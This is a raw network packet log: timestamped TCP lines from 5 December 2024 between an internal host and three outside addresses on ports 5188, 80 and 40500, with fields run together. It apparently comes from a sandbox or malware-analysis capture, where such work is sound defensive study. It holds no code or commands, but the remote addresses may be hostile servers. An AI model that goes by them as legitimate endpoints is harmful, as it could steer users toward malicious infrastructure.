                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.093770981 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.098608017 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.098649025 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.098706961 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.103229046 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.103367090 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.103434086 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.107429028 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.107559919 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.107611895 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.111660957 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.111818075 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.111869097 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.115365982 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.115505934 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.115614891 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.119246960 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.119376898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.119457960 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.122904062 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.122967005 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.123039961 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.126480103 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.126585007 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.126630068 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.128243923 CET4979940500192.168.2.11176.67.79.229
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.129906893 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.130048990 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.130100012 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.133433104 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.133728027 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.133830070 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.136789083 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.136900902 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.136967897 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.140183926 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.140280008 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.140342951 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.143773079 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.143958092 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.144058943 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.147133112 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.147401094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.147804022 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.149084091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.149183035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.151195049 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.151237011 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.151262999 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.151294947 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.153192997 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.153640985 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.153728962 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.155272007 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.155352116 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.155432940 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.157372952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.157386065 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.157433033 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.159358025 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.159568071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.159631968 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.161415100 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.161456108 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.161533117 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.163510084 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.163624048 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.163764954 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.165621042 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.165633917 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.165708065 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.167591095 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.167701960 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.167833090 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.169604063 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.169754982 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.169914007 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.171797037 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.171926975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.171977997 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.173783064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.173912048 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.173963070 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.175755978 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.175980091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.176037073 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.177819967 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.178046942 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.178139925 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.179902077 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.179987907 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.180036068 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.181925058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.182075024 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.182145119 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.183964014 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190130949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190151930 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190162897 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190238953 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190275908 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190303087 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190315008 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190325975 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190339088 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190360069 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190382004 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190501928 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190514088 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190526009 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190546036 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190566063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.236771107 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.248336077 CET4050049799176.67.79.229192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.251821041 CET4979940500192.168.2.11176.67.79.229
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.253854990 CET4979940500192.168.2.11176.67.79.229
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.273639917 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.273884058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.274002075 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.274687052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.274776936 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.274843931 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.276758909 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.277004957 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.277055979 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.278779030 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.278938055 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.279763937 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.280797958 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.281075954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.281222105 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.283001900 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.283118963 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.283225060 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.284838915 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.284972906 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.285567999 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.286823034 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.286976099 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.287031889 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.288732052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.288887024 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.288954973 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.290570974 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.290642023 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.291764021 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.292351961 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.292489052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.294112921 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.294167995 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.294250965 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.294996977 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.295834064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.295983076 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.296020031 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.297487020 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.297610044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.297665119 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.299525976 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.299679041 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.299724102 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.300893068 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.300910950 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.300991058 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.302572012 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.302623987 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.302800894 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.304083109 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.304130077 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.304212093 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.305679083 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.305721045 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.305890083 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.307215929 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.307327032 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.307751894 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.308783054 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.308862925 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.308923960 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.310086012 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.310148001 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.310153961 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.310204983 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.310383081 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.310542107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.310594082 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.311866045 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.311944008 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.312009096 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.313534021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.313611031 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.313674927 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.315156937 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.315267086 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.315332890 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.316644907 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.316831112 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.317605019 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.318130016 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.318289995 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.318346977 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.319859028 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.319870949 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.319931984 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.321223021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.321306944 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.321357012 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.322792053 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.322946072 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.323782921 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.324678898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.324714899 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.326253891 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.326273918 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.326309919 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.326327085 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.327430964 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.327516079 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.327788115 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.328995943 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.329051971 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.329746008 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.330539942 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.330576897 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.330616951 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.332129002 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.332732916 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.332792997 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.333726883 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.333810091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.335258007 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.335318089 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.335359097 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.336112022 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.336815119 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.336827993 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.336870909 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.338418961 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.338505030 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.338768005 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.339958906 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.340048075 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.340169907 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.341459036 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.341607094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.341697931 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.343044996 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.343197107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.343806028 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.344598055 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.344671011 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.346164942 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.346224070 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.346226931 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.346271992 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.347672939 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.347839117 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.348212957 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.349267960 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.349510908 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.350011110 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.351607084 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.351752043 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.352338076 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.352425098 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.352473021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.354249954 CET51884979292.255.85.66192.168.2.11
